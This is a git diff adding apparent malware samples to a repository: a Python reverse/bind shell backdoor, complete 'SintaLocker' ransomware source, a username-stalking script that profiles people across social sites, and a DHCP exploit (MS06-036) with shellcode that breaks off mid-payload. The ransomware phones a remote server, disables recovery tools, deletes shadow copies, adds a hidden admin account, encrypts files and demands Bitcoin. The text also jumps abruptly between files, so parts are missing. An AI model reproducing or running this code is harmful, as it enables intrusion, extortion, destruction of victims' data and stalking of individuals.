z*E9dt;H;6g%K_s%`PT$Y+I7D8rquew`t!#x-R+K`CCu;Q`Sn_;Fyh7+&#`UYlVGlv zP~o-VBB5~T8GEIgQQ-+lgfGg5=!iN;K9h8FO_N(i5dG04q7uEwB3)fX{Mh2hqAZT6 zOpb6KXvCR`7{LoI2hldgo0)vakGZY+Q20R>XPMx}dl4NttMB$d zg65JDmo|8n0d`3;@OQNVL1=Fp4$Mmb>CA5=cT59(eTi`yNdSMkS&%T%mvV#k7X3vE zvIy9n+u}Ih<%PfJr&KvF8^^0 z7$=RCEQ(oRTY`ExFZ6YjTge0N7E`}@{9VWB9j5NAyW?KG*1`s(^iMGJgDS+ikVaGWna&UqvszO?e_#6z zDswKN3`WfKtxlD8#s2>oRQ!#z*LKG&Q%d6f%GB-9ZTu=}dZuOeWdobrlx4JM4J)(r z00000finlL57+M*Vd`8+q^W9hkrI<>^t`Co!(#_*MH&SM?^rB0_|HvW;pw*>+b9)#cX?X>sbFM8<`TE|4hvs|rg`9jFQAsKhW)wWWrJNjb?G4Jg}wW0Rw8?^RdP)cCfm+6 zn@0{Kta9Xq!dX*^Ctmq;MKMjep#!}rNIa6u1H-&-{raEcMpJy2AFxwi0JieaY#fJx z^ycgo{!7CSo_(xGv|IxR{87!rdIt3!9zSBdj@IzARz+if3?LEYv%ox+U4wh2Nd)|q zaL%0@3G$iqpU>W{+2Y6{>FuN;VY-#kW4tD=YRQsU69e|&hQoc^2y8_3^vCH1>e3h+ z%L=bDk%G}ia!%%!ODG8mYYIN%*n$G7qxRv`Defxo^7-yp)*UO1NpbINk_$5VP2UvEXXgD0 zkuw;sMH{KEp@TF9ObNImsoF1TP7|anWG)d1kz-FKQb;-}sl%yn8L1;R z`L?b%aMFg_lkX(9=)E}kh0F|l<*~+)yH|xTzdFbt`07Uf|7dw zJV9G=jGkwxFaQ!HCd-{7ZF&cwxODYem|8f)lD%C$ga28@3VHIX;xFg0VU_ePfIsBA z9ShzUxSaAbYz5UDsKKJm?D@p#VmApTweYMYpQytux?O}`ZMz&u@4+6zM)R`X0|{OU zNALcNieT4C^3guzX$=jnt!^oA zW2B~?6&*952$tB1ejc&kMU6v7?PKS3`R_jIdEDzd<xrN$q@LADywwY4>gK1&j@d{js36|21FG*|Jc-7h36957injRD!cXrHue4}fZ60!D6Rn>8VjaacNtOlpLKOK5(@rsdMYDzz;f_y z7Da~b#k~b6wF|$Rs%@W;SRMzanGwEhVPsTtKnz>~?L0O9;ZG#&>e7_>EYIYX$ zq%DBruMIZ9k9zS4=+!wMhCrktc%rv21wP)B3HQsAC7PZtOG>AX^6Ma=VS6- z-7^PBp>NTO6xzPauf+4K1tQ8m2jlU6{%4%BX@tMQ?zAi$;5?a&!o0A^oef=_eQq`PDkGfrN&Wo zU1xe?s9g7tkNVXq$$>C-N;V4fH$b)4+VG&5oqqZp09c7~?L_cjX^7`rOu?ao93h+@ zn{f>D%};zX0|Um-o0C@i$P2BPc|s>n)#_%JnKry&aQPeQR^}`Qfr+RI-4$a#cV%xc z?@kQHqe55+RRuUM`c+XX`bYVoQ@Tf*+l`r%=n|5;(l+d){gyln)q3kJtM%qMKwK4< z6+3-akpySqiIp2@nfR+BU|^$MnoNi>R^T#Gbwq0yeZGPn3- zzSyeV@tCLn0t4+2>K&(t=!CTYuIz%PFJaGxkgyG6#Q~%9vACCE7{FaN`F6^oLsb&~ zEn=*90<(qv08F)foGyyzyWq|gW4&ipZEId`i!tg*%1 z6>vXCxR7FvcTx7C>}QwhyR3h0W|?gDqaM7FU(4~v_%muV$_taIPmV!@_+@jB*ScKk8k#m2fj1h4t{ro_1{%LOAApuEV23 z8wG!`phriOPXjo-Xi^1ccf6N~f`UW(zn9~&x#q}yEchbeZ7Gs~M4)Ps_a@*&N7+u2 zQG=L!yO_&8T2xkKxkBm=<`WPL+{gGL*vE6bm6yz(p4 zn-xLO6i#-w#U|47he%h(k6fxx%*2F93k%}aecaHPKXfFDS94is*1OncYJpsXWuE}2 zV)t4AdV_WB$#O~P`7kA58=m~72QZ=!Q!>iP*R2*>z!6V9+DNteired~gW%ED&mMxo zMtQ6}ZPQ3#_@m%K=c*F0jUQ4W8HtoS)D9lxY^dA_0sOk~OZmvb%A2KiJAjN2D$hE` zKjanr=Zf_53cEKv+rod4X+2}r7`3g|&UY^000*Tz+ssI35nnU2MYlJ0V4we V0R>$EKmY&?xQ+?|(!nc|000vzjN@uuI zJag?dTF&$6b6#|`ZRO*s(Sx9=Gm1Qm1gmEfFZK^J`9|Oewso8lCa`SXM4piq(pzUMXSfS;jxF97q|cyzb8E__V2d zFpbrjXP)bURa>iY45IXRJOEw5=$#D!jY1Hgw8t=PtjB&AfUCy%4UF}7_-o=E&+qcI zdfNU`?}Xq(RffEAmLf?q2Uw%7fTD|COUf3Jkyg80ILDaR5 z7f+!zqsBN?aaQU}j6z;GxHOO3fBH{K&c*U}uayGMe^fgsvOh(ifect?NY!cN4btcfm=ehis9iMMzV0bzZoY<$`XSmBEX1LC`g6BT=@ zrF7n#|CZcBRum@|Wn|M7a4N#(#)p=~`ZbAUa;o0~WUh$7c$qVHV?xMEPFc`XhCt1^ zLzJczO>|%HPue|ljf%dkDv|)L0-Ph|a-2pQJzhvI@8Ai(+7hY~T0p%LWC{=9UfAEN zDO1p&sY611R4$o068FS^95<$tI>mMGQ+iJKlFvuwLI>i>VX$z5T$bhCC^>fuaHDCq zr}A=Ps23xj0nc@ckYV(3RK`~Zl%zptt}49=Xzp@$AzH#AxSFiog7SpF*TU11V?(+v z`d=!rWU9Z5B5IE4<^rRwtt0`{ba;yO+zJ^kH7O;yUs)8G=>_kD5+znJS~O;r-m;f^ zG#>aQjhyyIbD~J|$a8WxhuC272hXTT+61TxYuDtq+oqIZzJ1J5m02Z)aFCevpY_O>+0E zwJWUr)F&=u$GS#%e6U*NL9m+M!4K%ZUu=rJ zyTA7$R8nhT*uJr-MX5}Do+7rByAsnbx$y4-AN(HQ9b#1MIx7`?1qNM*Zi{L9D)_$= z{9D+B9K|S?w>eVf`PbU$m`>6?Js3f%Hy`RtBmhcCWm96tF2K0YUw?2OGRy~Bz|$>7 zoi|S;1CObwUib&Hqzv(h%~eKmt939fgw$n`q0?IT&l1l7pV^JR`0h6T&E)bS(r||` z@0cfccg=e#W`g0HE=##D%XhSj~m{BSh9Ho_yGg}Zq zkl(mW7-=pRjdYu*C0)t7?YaCzOupHX0nBm z_t!PEQpkgL|B&L{O7wrGx-I^LMW${uFL9_4RxQLRD(p~tnqG86h*o?*-Xe<~j+mRd zse05iVA;Z!Wa_-3?;hkABZ^Hi&C({mv;{Ols4g?g6H4ttZ0W4Ok6GV6+q5 z8n7x9xK4G1xtHxsgsoH9(5gi1@lFMQyjO7cu)je^z4_^Wm4$&m9d3%!cbG-hQf>f* z!^ea!3$4}dIg{^plKKmlitb|6X;ytf!+#tsbS#*~?RsjXRhT&#gf{Z9_!SpY7$4N} z>gLE+wluKr3@>1Cv*e3PJ>lo>PXEvkNQVt`WoPj2ajnL(;Kp72n7Y4I5ok-Pb|-PSw`%%A!}FJ@V=Wp+UspWg zE@%HfTynSHeZ+D5Mr2I~T>Ji`gIUzbJT4fO&vsL;F-V8uTCfG)Y3zF z=ix$LWuOVZrDM(lT(Jl4ZZ6u(cSDkF!A+bap&nJA%AV%tFJljz(xX!LI$bTLO9U}f zqMA>FOr`hou(dOmkl4DXj_q_9@bex+6Qv3$z3F>$PbZYUMT1*gaq2FsLk#hW5CsoB zph>m9f9tH*m!Q1q%J<6n8}((uFDZBS)+S zuBxr}V)u;D1@n5L_*Z=LQXDIZPf=cAZy=az0AMjB2>3yo)eT1lqdJq(uzw)9G8ci) z;#tG@%N;S7IcziR5|tleKD+Yzqe6lYtIQkStRt$9)Y0o4Mv>oE0`iPd_m*@<%CwM6 z9b*|4{)`Xfm#7KZL}l6=o_%8ya#uLlfO{xCc5rZvsx)VA8Sol;PJ?zR(5=BsIr(sa!L@xuJBx9LBoqK)i0Tr$vI zq>qyO#0_M;gGnxfW#L>nbBDlMok9LYE!b%aAdK=UXDx>zDm-VO8Nk1(CB;oHadQ)}JIXQL~nMDd(V zhstdjfov*IJ9vh98FB*(2jV&}=?^ZTR473Y{j`FCvIqLX-A9p#1)U2TG&@_*GwY7g za7(wj=WuF#`Wkr^AV5t*P^C#Sx5^IcM=#~HXlePnDxacuamf0*qE>)mG&YR5@D$vb&_3AfFnPnU zb)RBb##n;lhO>b)4F0=Cj-t%hUF4Vx)dsP zAZB_XjDy(mcZzsQFT}E1iq}Z!kfIeWGgg=C;fWST9g|pTJ*xQ?n|?W;qgT)TJ1^MyBBpPvy=_<-yw~S7d1YQS3-Ga=0S&f-Eh1h@5OEJ; z_A=vPN{FgW{W}8$uP+``6ZYpxEf{YHT znnLgIWUP%A(nmPkzH)NVPK9CREG2@EQ@01Iq`qDd|3iWQ7N;!%p>f9)0?x-cne_*D zN#iHBQM+`Yyn_xp`I#3}%|}4r9(pm!cFbGM4?O=w37`L`lrAEm4t*zlW1JNj`T0os zrsjo2gIYpdQqdRoEBDe5HCJ-y%=I9tO~UCC&=$4v6KA~u+7Ke!-@)dO?_iX;_y9+} zEr(A9AE_DVz2NWX8UM_eVaNYUoMA*bs~c#@kiUV+VFs^TT#m(8Sac%+v8*H_VK~>v zqN;Uz?*IS*finlL57oc8kk=&B{QK;rTctan^l!Z#pk?uiGt0d)8QxWuaO01Sa5 L3IVE9iz@&Cjchgk literal 0 HcmV?d00001 diff --git a/Python/Backdoor.Python.RShell b/Python/Backdoor.Python.RShell new file mode 100644 index 00000000..3c57bd43 --- /dev/null +++ b/Python/Backdoor.Python.RShell @@ -0,0 +1,121 @@ +#!/usr/bin/env python + +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# d00r.py 0.3a (reverse|bind)-shell in python by fQ # +# # +# alpha # +# # +# # +# usage: # +# % ./d00r -b password port # +# % ./d00r -r password port host # +# % nc host port # +# % nc -l -p port (please use netcat) # +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + +import os, sys, socket, time + + +# =================== var ======= +MAX_LEN=1024 +SHELL="/bin/zsh -c" +TIME_OUT=300 #s +PW="" +PORT="" +HOST="" + + +# =================== funct ===== +# shell - exec command, return stdout, stderr; improvable +def shell(cmd): + sh_out=os.popen(SHELL+" "+cmd).readlines() + nsh_out="" + for i in range(len(sh_out)): + nsh_out+=sh_out[i] + return nsh_out + +# action? +def action(conn): + conn.send("\nPass?\n") + try: pw_in=conn.recv(len(PW)) + except: print "timeout" + else: + if pw_in == PW: + conn.send("j00 are on air!\n") + while True: + conn.send(">>> ") + try: + pcmd=conn.recv(MAX_LEN) + except: + print "timeout" + return True + else: + #print "pcmd:",pcmd + cmd=""#pcmd + for i in range(len(pcmd)-1): + cmd+=pcmd[i] + if cmd==":dc": + return True + elif cmd==":sd": + return False + else: + if len(cmd)>0: + out=shell(cmd) + conn.send(out) + + +# =================== main ====== +argv=sys.argv + +if len(argv)<4: + print "error; help: head -n 16 d00r.py" + sys.exit(1) +elif argv[1]=="-b": + PW=argv[2] + PORT=argv[3] +elif argv[1]=="-r" and len(argv)>4: + PW=argv[2] + PORT=argv[3] + HOST=argv[4] +else: exit(1) + +PORT=int(PORT) +print "PW:",PW,"PORT:",PORT,"HOST:",HOST + +#sys.argv[0]="d00r" + +# exit father proc +if os.fork()!=0: + sys.exit(0) + +# associate the socket +sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(TIME_OUT) + +if argv[1]=="-b": + sock.bind(('localhost', PORT)) + sock.listen(0) + +run=True +while run: + + if argv[1]=="-r": + try: sock.connect( (HOST, PORT) ) + except: + print "host unreachable" + time.sleep(5) + else: run=action(sock) + else: + try: (conn,addr)=sock.accept() + except: + print "timeout" + time.sleep(1) + else: run=action(conn) + + # shutdown the sokcet + if argv[1]=="-b": conn.shutdown(2) + else: + try: sock.send("") + except: time.sleep(1) + else: sock.shutdown(2) \ No newline at end of file diff --git a/Python/CryPy_Source.py b/Python/CryPy_Source.py new file mode 100644 index 00000000..394a922d --- /dev/null +++ b/Python/CryPy_Source.py @@ -0,0 +1,463 @@ +import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2 +import SintaRegistery +import SintaChangeWallpaper +from Crypto import Random +from Crypto.Cipher import AES +rmsbrand = 'SintaLocker' +newextns = 'sinta' +encfolder = '__SINTA I LOVE YOU__' +email_con = 'sinpayy@yandex.com' +btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1' +userhome = os.path.expanduser('~') +my_server = 'http://www.dobrebaseny.pl/js/lib/srv/' +wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg' +victim_info = base64.b64encode(str(platform.uname())) +configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname())) +glob_config = None +try: + glob_config = json.loads(urllib.urlopen(configurl).read()) + if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']): + raise Exception('0x00001') +except IOError: + time.sleep(1) + +victim_id = glob_config[u'MRU_ID'] +victim_r = glob_config[u'MRU_UDP'] +victim_s = glob_config[u'MRU_PDP'] +try: + os.system('bcdedit /set {default} recoveryenabled No') + os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f') +except WindowsError: + pass + +def setWallpaper(imageUrl): + try: + wallpaper = SintaChangeWallpaper.ChangeWallpaper() + wallpaper.downloadWallpaper(imageUrl) + except: + pass + + +def persistance(): + try: + SintaRegistery.addRegistery(os.path.realpath(__file__)) + except: + pass + + +def destroy_shadow_copy(): + try: + os.system('vssadmin Delete Shadows /All /Quiet') + except: + pass + + +def create_remote_desktop(): + try: + os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f') + os.system('net user ' + victim_r + ' ' + victim_s + ' /add') + os.system('net localgroup administrators ' + victim_r + ' /add') + except: + pass + + +def write_instruction(dir, ext): + try: + files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w') + files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '') + except: + pass + + +def delete_file(filename): + try: + os.remove(filename) + except: + pass + + +def find_files(root_dir): + write_instruction(root_dir, 'md') + extentions = ['*.txt', + '*.exe', + '*.php', + '*.pl', + '*.7z', + '*.rar', + '*.m4a', + '*.wma', + '*.avi', + '*.wmv', + '*.csv', + '*.d3dbsp', + '*.sc2save', + '*.sie', + '*.sum', + '*.ibank', + '*.t13', + '*.t12', + '*.qdf', + '*.gdb', + '*.tax', + '*.pkpass', + '*.bc6', + '*.bc7', + '*.bkp', + '*.qic', + '*.bkf', + '*.sidn', + '*.sidd', + '*.mddata', + '*.itl', + '*.itdb', + '*.icxs', + '*.hvpl', + '*.hplg', + '*.hkdb', + '*.mdbackup', + '*.syncdb', + '*.gho', + '*.cas', + '*.svg', + '*.map', + '*.wmo', + '*.itm', + '*.sb', + '*.fos', + '*.mcgame', + '*.vdf', + '*.ztmp', + '*.sis', + '*.sid', + '*.ncf', + '*.menu', + '*.layout', + '*.dmp', + '*.blob', + '*.esm', + '*.001', + '*.vtf', + '*.dazip', + '*.fpk', + '*.mlx', + '*.kf', + '*.iwd', + '*.vpk', + '*.tor', + '*.psk', + '*.rim', + '*.w3x', + '*.fsh', + '*.ntl', + '*.arch00', + '*.lvl', + '*.snx', + '*.cfr', + '*.ff', + '*.vpp_pc', + '*.lrf', + '*.m2', + '*.mcmeta', + '*.vfs0', + '*.mpqge', + '*.kdb', + '*.db0', + '*.mp3', + '*.upx', + '*.rofl', + '*.hkx', + '*.bar', + '*.upk', + '*.das', + '*.iwi', + '*.litemod', + '*.asset', + '*.forge', + '*.ltx', + '*.bsa', + '*.apk', + '*.re4', + '*.sav', + '*.lbf', + '*.slm', + '*.bik', + '*.epk', + '*.rgss3a', + '*.pak', + '*.big', + '*.unity3d', + '*.wotreplay', + '*.xxx', + '*.desc', + '*.py', + '*.m3u', + '*.flv', + '*.js', + '*.css', + '*.rb', + '*.png', + '*.jpeg', + '*.p7c', + '*.p7b', + '*.p12', + '*.pfx', + '*.pem', + '*.crt', + '*.cer', + '*.der', + '*.x3f', + '*.srw', + '*.pef', + '*.ptx', + '*.r3d', + '*.rw2', + '*.rwl', + '*.raw', + '*.raf', + '*.orf', + '*.nrw', + '*.mrwref', + '*.mef', + '*.erf', + '*.kdc', + '*.dcr', + '*.cr2', + '*.crw', + '*.bay', + '*.sr2', + '*.srf', + '*.arw', + '*.3fr', + '*.dng', + '*.jpeg', + '*.jpg', + '*.cdr', + '*.indd', + '*.ai', + '*.eps', + '*.pdf', + '*.pdd', + '*.psd', + '*.dbfv', + '*.mdf', + '*.wb2', + '*.rtf', + '*.wpd', + '*.dxg', + '*.xf', + '*.dwg', + '*.pst', + '*.accdb', + '*.mdb', + '*.pptm', + '*.pptx', + '*.ppt', + '*.xlk', + '*.xlsb', + '*.xlsm', + '*.xlsx', + '*.xls', + '*.wps', + '*.docm', + '*.docx', + '*.doc', + '*.odb', + '*.odc', + '*.odm', + '*.odp', + '*.ods', + '*.odt', + '*.sql', + '*.zip', + '*.tar', + '*.tar.gz', + '*.tgz', + '*.biz', + '*.ocx', + '*.html', + '*.htm', + '*.3gp', + '*.srt', + '*.cpp', + '*.mid', + '*.mkv', + '*.mov', + '*.asf', + '*.mpeg', + '*.vob', + '*.mpg', + '*.fla', + '*.swf', + '*.wav', + '*.qcow2', + '*.vdi', + '*.vmdk', + '*.vmx', + '*.gpg', + '*.aes', + '*.ARC', + '*.PAQ', + '*.tar.bz2', + '*.tbk', + '*.bak', + '*.djv', + '*.djvu', + '*.bmp', + '*.cgm', + '*.tif', + '*.tiff', + '*.NEF', + '*.cmd', + '*.class', + '*.jar', + '*.java', + '*.asp', + '*.brd', + '*.sch', + '*.dch', + '*.dip', + '*.vbs', + '*.asm', + '*.pas', + '*.ldf', + '*.ibd', + '*.MYI', + '*.MYD', + '*.frm', + '*.dbf', + '*.SQLITEDB', + '*.SQLITE3', + '*.asc', + '*.lay6', + '*.lay', + '*.ms11 (Security copy)', + '*.sldm', + '*.sldx', + '*.ppsm', + '*.ppsx', + '*.ppam', + '*.docb', + '*.mml', + '*.sxm', + '*.otg', + '*.slk', + '*.xlw', + '*.xlt', + '*.xlm', + '*.xlc', + '*.dif', + '*.stc', + '*.sxc', + '*.ots', + '*.ods', + '*.hwp', + '*.dotm', + '*.dotx', + '*.docm', + '*.DOT', + '*.max', + '*.xml', + '*.uot', + '*.stw', + '*.sxw', + '*.ott', + '*.csr', + '*.key', + 'wallet.dat'] + for dirpath, dirs, files in os.walk(root_dir): + if 'Windows' not in dirpath: + for basename in files: + for ext in extentions: + if fnmatch.fnmatch(basename, ext): + filename = os.path.join(dirpath, basename) + yield filename + + +def make_directory(file_path): + directory = file_path + '' + encfolder + if not os.path.exists(directory): + try: + os.makedirs(directory) + except: + pass + + +def text_generator(size = 6, chars = string.ascii_uppercase + string.digits): + return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns + + +def generate_file(file_path, filename): + make_directory(file_path) + key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ]) + newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm') + try: + encrypt_file(key, filename, newfilename) + except: + pass + + +def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16): + if not out_filename: + out_filename = newfilename + iv = ''.join((chr(random.randint(0, 255)) for i in range(16))) + encryptor = AES.new(key, AES.MODE_CBC, iv) + filesize = os.path.getsize(in_filename) + with open(in_filename, 'rb') as infile: + with open(out_filename, 'wb') as outfile: + outfile.write(struct.pack(' 1: + global urls_stalk + pastebin_url = "https://pastebin.com/u/" + user + pastebin_str = "s Pastebin - Pastebin.com" + patreon_url = "https://www.patreon.com/" + user + patreon_str = 'created_at' + gutefrage_url = "https://www.gutefrage.net/nutzer/" + user + gutefrage_str = '' + facebook_url = 'https://facebook.com/' + user + facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user + instagram_url = "https://www.instagram.com/" + user + "/" + instagram_str = '' + steam_url = "https://steamcommunity.com/id/" + user + steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif' + twitch_url = "https://www.twitch.tv/" + user + twitch_str = "content='twitch://stream/" + user + lachschon_url = "https://www.lachschon.de/community/user/" + user + "/" + lachschon_str = '' + + URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url] + STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str] + + for i in range(0, len(URLS)): + html = getResponse(URLS[i]) + if STRS[i].lower() in str(html).lower(): + print("\t> " + URLS[i]) + urls_stalk.append(URLS[i]) + +def get_twitter_img(user): + url = "https://twitter.com/" + user + html = subprocess.getoutput("phantomjs html.js " + url) + image = find_between(html, '')
+    r = requests.get(image)
+    with open('Twitter.jpg', 'wb') as f:
+        f.write(r.content)
+
+def get_instagram_img(user):
+    data = {
+    'username': user,
+    'submit': 'View DP'
+    }
+    response = requests.post('https://fullinstadp.com/index.php', data=data)
+    html = response.text
+    f = open(https?://[^\s]+)", word).group("url") + if '//t.co/' in url: + last = url[-1:] + if last == ".": + url = url.rstrip('.') + r = requests.get(url) + url = r.url + urls.append(url) + except: + e = "" + +def check_string_socialmedia(string): + global social_media + count = 0 + next = 0 + for word in string.split(" "): + next = count + 2 + if 'facebook' in word.lower(): + print(string.split(" ")[next]) + count +=1 + +def youtube(url): + url = url + "/about" + html = subprocess.getoutput("phantomjs html.js " + url) + tmp_str = html.split('"}},"urlEndpoint":') + for url in tmp_str: + #print(url) + url = find_between(url, '{"url":"', '","target":') + print(html) + +def grab_instagram(profile): + global done_checks + global urls + global instagram + global usernames + global compare + if not "instagram: " + profile in done_checks: + if not profile in usernames: + usernames.append(profile) + url = "https://www.instagram.com/" + profile + "/" + html = subprocess.getoutput("phantomjs html.js " + url) + if '"@type":"Person","name":"' in html: + display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"') + if not display_name in usernames: + usernames.append(display_name) + if not "instagram: " + display_name in done_checks: + print(display_name) + stalk(display_name) + instagram.append("Display Name: " + display_name) + description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer') + follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer') + check_string_mail(description) + check_string_url(description) + instagram.append("Description: " + description) + instagram.append("Follower: " + follower) + #get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion + compare = True + if not "instagram: " + profile in done_checks: + done_checks.append("instagram: " + profile) + +def grab_steam(url): + global done_checks + global urls + global usernames + if not "steam: " + profile in done_checks: + url = url + "/ajaxaliases/" + response = requests.get(url) + html = response.text + for item in html.split("newname"): + username = find_between(item, '":"', '","timechanged') + if not username in usernames: + usernames.append(username) + + + +def grab_twitter(profile): + global done_checks + global urls + global adresse + global usernames + global twitter + global first_dl + if not "twitter: " + profile in done_checks: + url = "https://twitter.com/" + profile + urls.append(url) + html = subprocess.getoutput("phantomjs html.js " + url) + #variables + display_name = find_between(html, '', ' (@') + if not profile in usernames: + usernames.append(profile) + if not display_name in usernames: + usernames.append(display_name) + if not "twitter: " + display_name in done_checks: + print(display_name) + stalk(display_name) + join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten') + description = "" + url = "" + location = "" + #if + if '<meta name="description"' in html: + description = find_between(html, '<meta name="description" content="', '">') + description = description.replace(""", "") + check_string_mail(description) + check_string_url(description) + if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html: + tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>') + url = find_between(tmp, '" title="', '">') + urls.append(url) + if 'location":"' in html: + location = find_between(html, '"location":"', '","url') + if len(location) > 0: + adresse = location + twitter.append("Display Name: " + display_name) + twitter.append("Join Date: " + join_date) + twitter.append("Description: " + description) + twitter.append("URL: " + url) + twitter.append("Location: " + location) + twitter.append(" ") + #if first_dl == False: + #get_twitter_img(profile) + #first_dl = True + if not "twitter: " + profile in done_checks: + done_checks.append("twitter: " + profile) + + + +def handle(): + try: + if sys.argv[1]: + social_media = sys.argv[1].lower() + if sys.argv[2]: + info_type = sys.argv[2].lower() + if sys.argv[3]: + infos = sys.argv[3].lower() + if info_type == "url": + if social_media == "youtube": + youtube(infos) + elif info_type == "profile": + if social_media == "twitter": + grab_twitter(infos) + elif info_type == "user": + if social_media == "stalk": + stalk(infos) + except Exception as e: + print(e) + +def find_between( s, first, last ): + try: + start = s.index( first ) + len( first ) + end = s.index( last, start ) + return s[start:end] + except ValueError: + return "" + +def getResponse(url): + response = requests.get(url) + #response.raise_for_status() + data = response.content + return data + + + +handle() + +for url in urls_stalk: + #print(url) + if 'twitter.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "twitter: " + profile: + checked = True + if not checked: + grab_twitter(profile) + done_checks.append("twitter:" + profile) + + if 'instagram.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "instagram: " + profile: + checked = True + if not checked: + grab_instagram(profile) + #print("Download Profile Picture") + done_checks.append("instagram: " + profile) + #Steam Check direkt in der Stalk Funktion + if 'steamcommunity.com' in url: + checked = False + profile = url.split("/")[4] + for check in done_checks: + if check == "steam: " + profile: + checked = True + if not checked: + grab_steam(url) + done_checks.append("steam: " + profile) + + +print("------------------") +print("Usernames:") +print("------------------") +for user in usernames: + print(user) + stalk(user) + +if len(urls) > 0: + print("------------------") + print("URLs:") + print("------------------") + for url in urls: + print(url) + +if len(twitter) > 0: + print("------------------") + print("Twitter:") + print("------------------") + for item in twitter: + print(item) + +if len(instagram) > 0: + print("------------------") + print("Instagram:") + print("------------------") + for item in instagram: + print(item) + +if len(steam) > 0: + print("------------------") + print("Steam:") + print("------------------") + for item in steam: + print(item) + +print("------------------") +print("Sites checked:") +print("------------------") +for check in done_checks: + print(check) diff --git a/Python/Exploit.Python.Ms06-036.a b/Python/Exploit.Python.Ms06-036.a new file mode 100644 index 00000000..3dea8e3a --- /dev/null +++ b/Python/Exploit.Python.Ms06-036.a @@ -0,0 +1,237 @@ +#!/usr/bin/env python +# +# +# by redsand@blacksecurity.org +# this (like any thing) would not be possible w/out the bl4ck team. +# thanks guys. +# + +import sys, os + +sys.path.append("pydhcplib") + +from scapy import * + +from pydhcplib.dhcp_packet import * +from pydhcplib.dhcp_network import * +from pydhcplib.type_strlist import * +from pydhcplib.type_ipv4 import * +from pydhcplib.type_hw_addr import * + +inet_face = "vmnet8" + +default_ip = "10.31.33.7" + +# user bl4ck/bl4ck +# this exits via Thread (so thta we kill the dhcp thread in services.exe +# +# this means if services doesn't crash, it was a successful exploit +# +scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \ +"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \ +"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \ +"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \ +"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \ +"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \ +"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \ +"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \ +"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \ +"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \ +"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \ +"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \ +"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \ 